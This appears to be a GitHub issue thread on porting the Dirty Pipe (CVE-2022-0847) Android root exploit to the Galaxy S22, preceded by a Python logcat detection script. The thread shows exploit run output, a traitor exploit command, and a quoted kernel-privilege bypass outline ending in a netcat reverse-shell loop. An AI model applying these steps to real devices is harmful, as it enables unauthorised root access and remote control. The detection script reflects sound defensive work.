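For anyone monitoring devices, the debug lines quoted in the comments above double as detection signals: a fatal native crash inside init, and SELinux denials where the vendor_modprobe domain touches a dot-file under /dev or a pipe owned by init. The sketch below is an added example, not part of the thread or of the project's code; the rule names and the `scan()` helper are hypothetical, and the sample log is the thread's own lines plus one constructed benign line.

```python
import re
from dataclasses import dataclass

# Sample input: log lines quoted in the thread, plus one constructed
# benign line (the last one) to show that ordinary traffic is ignored.
SAMPLE_LOGCAT = """\
03-29 21:47:19.811 24886   375 F libc    : Fatal signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x7fad3d4001 in tid 24886 (init), pid 24886 (init)
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:76): avc: denied { read } for path="/dev/.dirtypipe-0005" dev="tmpfs" ino=1166 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:77): avc: denied { read } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:78): avc: denied { write } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.331  3278  3278 I modprobe-payload: Parsed lib_mod: /vendor/lib/libstagefright_soft_mp3dec.so
03-29 22:25:09.000  1200  1200 I ActivityManager: constructed benign line
"""

# logcat "threadtime" layout: date time PID TID level tag: message
LINE_RE = re.compile(
    r"^(\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})\s+(\d+)\s+(\d+)\s+([VDIWEF])\s+(.*?)\s*: (.*)$"
)
# bionic's fatal-signal line ends with "pid <n> (<process name>)"
CRASH_RE = re.compile(r"Fatal signal \d+ \((\w+)\).*\bpid \d+ \(([^)]+)\)\s*$")
# SELinux audit record as relayed through logcat
AVC_RE = re.compile(
    r"avc:\s+denied\s+\{\s*([^}]*?)\s*\}.*?"
    r"scontext=(\S+)\s+tcontext=(\S+)\s+tclass=(\S+)"
)
PATH_RE = re.compile(r'path="([^"]*)"')

# Source domains whose denials are inspected (hypothetical watch list).
WATCHED_DOMAINS = {"vendor_modprobe"}


@dataclass
class Finding:
    rule: str
    timestamp: str
    pid: int
    detail: str


def selinux_type(context: str) -> str:
    """Return the type field of a 'user:role:type:level' SELinux context."""
    parts = context.split(":")
    return parts[2] if len(parts) > 2 else context


def scan(text: str) -> list:
    """Return heuristic findings for the log patterns shown in the thread."""
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts, pid, _tid, level, tag, msg = m.groups()

        # Rule 1: a native crash in a process named init.
        if tag == "libc" and level == "F":
            crash = CRASH_RE.search(msg)
            if crash and crash.group(2) == "init":
                findings.append(Finding("init-native-crash", ts, int(pid), crash.group(1)))
            continue

        avc = AVC_RE.search(msg)
        if not avc or selinux_type(avc.group(2)) not in WATCHED_DOMAINS:
            continue
        perms, _sctx, tctx, tclass = avc.groups()
        path_match = PATH_RE.search(msg)
        path = path_match.group(1) if path_match else ""

        # Rule 2: modprobe domain using a pipe labelled with init's context.
        if tclass == "fifo_file" and selinux_type(tctx) == "init":
            findings.append(Finding("modprobe-init-pipe", ts, int(pid), f"{perms} {path}"))
        # Rule 3: modprobe domain reading a hidden dot-file directly under /dev.
        elif tclass == "file" and path.startswith("/dev/."):
            findings.append(Finding("modprobe-hidden-dev-file", ts, int(pid), f"{perms} {path}"))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGCAT):
        print(f"{f.timestamp} pid={f.pid} {f.rule}: {f.detail}")
```

These are heuristics tuned to the lines in this thread; a fleet deployment would feed `scan()` from collected logcat or audit logs and treat hits as leads to correlate, not verdicts.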

@polygraphene
Owner

dirtypipe-android-1.0.3-beta.zip

Try this version if you succeeded in running debug1-3.
If this version still reboots the device, there is something wrong with the kernel module.

@elliwigy

dirtypipe-android-1.0.3-debug2.zip

Try second version if you got "libc : Fatal signal ..." in logcat. It will generate empty file on /dev/.s2a if stage2 was successfully called.

Run adb shell ls /dev/.s2a to check if file exists When file exists, it says "Permission denied":

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: Permission denied

When not exists (failed to call stage2), it says "No such file or directory" (or reboot):

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: No such file or directory

Output of run.bat

dirtypipe-android: 1 file pushed, 0 skipped. 0.2 MB/s (45168 bytes in 0.186s)
startup-root: 1 file pushed, 0 skipped. 0.6 MB/s (3671 bytes in 0.006s)
magisk/busybox: 1 file pushed, 0 skipped. 85.1 MB/s (2102536 bytes in 0.024s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 58.6 MB/s (672928 bytes in 0.011s)
4 files pushed, 0 skipped. 8.5 MB/s (2824303 bytes in 0.318s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f
Empty space size: 2096 bytes
Run index: 8
Stage1 debug filename: /dev/.dirtypipe-0008
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .

Logcat

It crashes before I can check if the /dev file exists.. It does a kernel panic.

@elliwigy

dirtypipe-android-1.0.3-beta.zip

Try this version if you succeeded in running debug1-3. If this version still reboots the device, there is something wrong with the kernel module.

Yep, kernel panic/crash on my S22 Ultra

@sac23

sac23 commented Jun 16, 2022

how please can u share @Tahadergan

@jojos38

jojos38 commented Jun 17, 2022

Sad, I updated to the version which disallows rolling back the kernel version.
I mean, would we be able to use OTA anyway with such a method? Or would we be stuck on the version where the breach was still doable?

@yunasc

yunasc commented Jun 19, 2022

Done root s22 ultra

Nice one! I'm on the same kernel with S22+ (S906B).
Will it work?

Looking forward to the details about the method(s).

@bklynali

bklynali commented Jun 20, 2022

Done root s22 ultra

Nice. Can you please share how?

@elliwigy

Done root s22 ultra

Nice one! I'm on the same kernel with S22+ (S906B). Will it work?

Looking forward to the details about the method(s).

I highly doubt they'll share anything.. dunno y even post really as they have no intentions to share how

@oakieville
Author

Interesting his context is vendor_modprobe

@elliwigy

elliwigy commented Jun 27, 2022

Interesting his context is vendor_modprobe

So is the original poc lol

if u look at screenshot on main screen you will see it's also vendor_modprobe context

@oakieville
Author

oakieville commented Jun 27, 2022

Interesting his context is vendor_modprobe

So is the original poc lol

if u look at screenshot on main screen you will see it's also vendor_modprobe context

So is that where it's failing for us? Cause for me it is not vendor_modprobe context when running commands in shell. The poc code runs as vendor_modprobe to do the module but running uname is not

@oakieville
Author

Think I for the most part lost interest in this. Sucks the dude figured it out but didn't share, and I simply lack the skill to do it. I'm hoping on elliwigy figuring it out

@elliwigy

Interesting his context is vendor_modprobe

So is the original poc lol
if u look at screenshot on main screen you will see it's also vendor_modprobe context

So is that where it's failing for us? Cause for me it is not vendor_modprobe context when running commands in shell. The poc code runs as vendor_modprobe to do the module but running uname is not

that's because it doesn't work/fully execute for us due to defex.. if it ran all the way through it would be in vendor_modprobe context.. with permissive you can change to that context but it doesn't do much for us unfortunately

@oakieville
Author

Yeah and not looking like he wants to share his trick either

@jojos38

jojos38 commented Jul 8, 2022

There was a new security breach discovered, apparently similar to Dirty Pipe, maybe this could be exploitable if someone finds more information on it?
https://game-news24.com/2022/07/06/the-galaxy-s22-series-has-the-new-security-vulnerabilities/

@elliwigy

elliwigy commented Jul 9, 2022

There was a new security breach discovered, apparently similar to Dirty Pipe, maybe this could be exploitable if someone finds more information on it? https://game-news24.com/2022/07/06/the-galaxy-s22-series-has-the-new-security-vulnerabilities/

doesn't help much right now at all lol.. probably be months before we see any details and it's patched.

@k0mraid3

Basically it should work by similar procedure. Need some modifications like:

  1. Fix function offset of libc++.so
  2. Choose proper library file to overwrite
  3. Build mymod.ko for s22 kernel source

If there is a dev interested in that, I can help them.

I'm interested. I've actually started a thread on XDA here: https://forum.xda-developers.com/t/open-dev-bruteroot-a-collection-of-root-tactics-possibly-force-bootloader-unlock-on-na-samsung-s22.4468083/page-2#post-87167275

But I'm aiming to compile as many methods as possible to escalate priv into an apk. Trying to drum up support and get help because apks aren't my thing.

@elliwigy

Basically it should work by similar procedure. Need some modifications like:

  1. Fix function offset of libc++.so
  2. Choose proper library file to overwrite
  3. Build mymod.ko for s22 kernel source

If there is a dev interested in that, I can help them.

I'm interested. I've actually started a thread on XDA here: https://forum.xda-developers.com/t/open-dev-bruteroot-a-collection-of-root-tactics-possibly-force-bootloader-unlock-on-na-samsung-s22.4468083/page-2#post-87167275

But I'm aiming to compile as many methods as possible to escalate priv into an apk. Trying to drum up support and get help because apks aren't my thing.

Not sure how much you read so far but we already have a working version of this PoC. It sets permissive but after viewing logs it appears defex is preventing root. So the PoC works but in order to gain root we need to somehow stop defex or bypass it etc. to gain root.

@bigjohn828

bigjohn828 commented Jul 31, 2022

Can this work?

DEFEX Bypass

As we saw above part, just calling call_usermodehelper doesn't work due to newly updated DEFEX. But, ueventd is root privileged process and its parent process is init process. And also it is not protected by DEFEX.

As similar to the way we bypass SELinux restriction, to bypass new DEFEX, all we need to do is calling call_usermodehelper's subroutines separately in ueventd process.

Set call_usermodehelper_setup's arguments in kernel memory via arbitrary kernel write primitive.
Call call_usermodehelper_setup with our arguments via arbitrary kernel function call primitive.
Read and Copy system_unbound_wq and sub_info data.
Call queue_work with copied system_unbound_wq and sub_info.
Due to DEFEX check in do_execve, we use shellscript like /system/bin/sh -c "while [ 1 ] ; do /system/bin/toybox nc ..." because /system/bin/sh has feature_safeplace_path attribute.
In this way, we can get reverse shell from remote server with full kernel privilege.

@elliwigy

You try it yet? lol

@bigjohn828

Ya got root, didn't you? Lol

@bigjohn828

bigjohn828 commented Aug 16, 2022

Taha Dergan, pls share with us your knowledge. You will be a legend

@bigjohn828

I apologize, deleted

@Tahadergan

I apologize, deleted

Message me on Twitter

@oakieville
Author

Ya got root, didn't you? Lol

So share bro or you just here to brag

@bigjohn828

bigjohn828 commented Aug 17, 2022 via email

@elliwigy

I apologize, deleted

Message me on Twitter

Why? You don't ever respond...

@thunderwolf66102

Curious - I can run the beta-4 release on my S22 Ultra and then I can subsequently run Traitor (https://github.com/liamg/traitor) which is then able to detect the dirty pipe vuln where it was not able to do so before. If I run the beta-4 release again, the unit will soft reboot and I will have to run it again before Traitor will recognize dirty pipe again.

Running ./traitor-arm64 --exploit kernel:CVE-2022-0847 from an adb shell seems to work but states that 'Exploit failed: unexpected data in /etc/passwd'

@elliwigy

Curious - I can run the beta-4 release on my S22 Ultra and then I can subsequently run Traitor (https://github.com/liamg/traitor) which is then able to detect the dirty pipe vuln where it was not able to do so before. If I run the beta-4 release again, the unit will soft reboot and I will have to run it again before Traitor will recognize dirty pipe again.

Running ./traitor-arm64 --exploit kernel:CVE-2022-0847 from an adb shell seems to work but states that 'Exploit failed: unexpected data in /etc/passwd'

That is normal behavior (not sure about traitor)

@oakieville
Author

Curious - I can run the beta-4 release on my S22 Ultra and then I can subsequently run Traitor (https://github.com/liamg/traitor) which is then able to detect the dirty pipe vuln where it was not able to do so before. If I run the beta-4 release again, the unit will soft reboot and I will have to run it again before Traitor will recognize dirty pipe again.

Running ./traitor-arm64 --exploit kernel:CVE-2022-0847 from an adb shell seems to work but states that 'Exploit failed: unexpected data in /etc/passwd'

etc/passwd is for the Linux version. If you look at the orig dirtypipe and the Android dirtypipe you'll see what I mean: the PC one uses etc/passwd, the Android one overwrites a .so

@thunderwolf66102

thunderwolf66102 commented Sep 30, 2022 via email

@Nesqu1k2020

Anyone got root ? Or never finished?
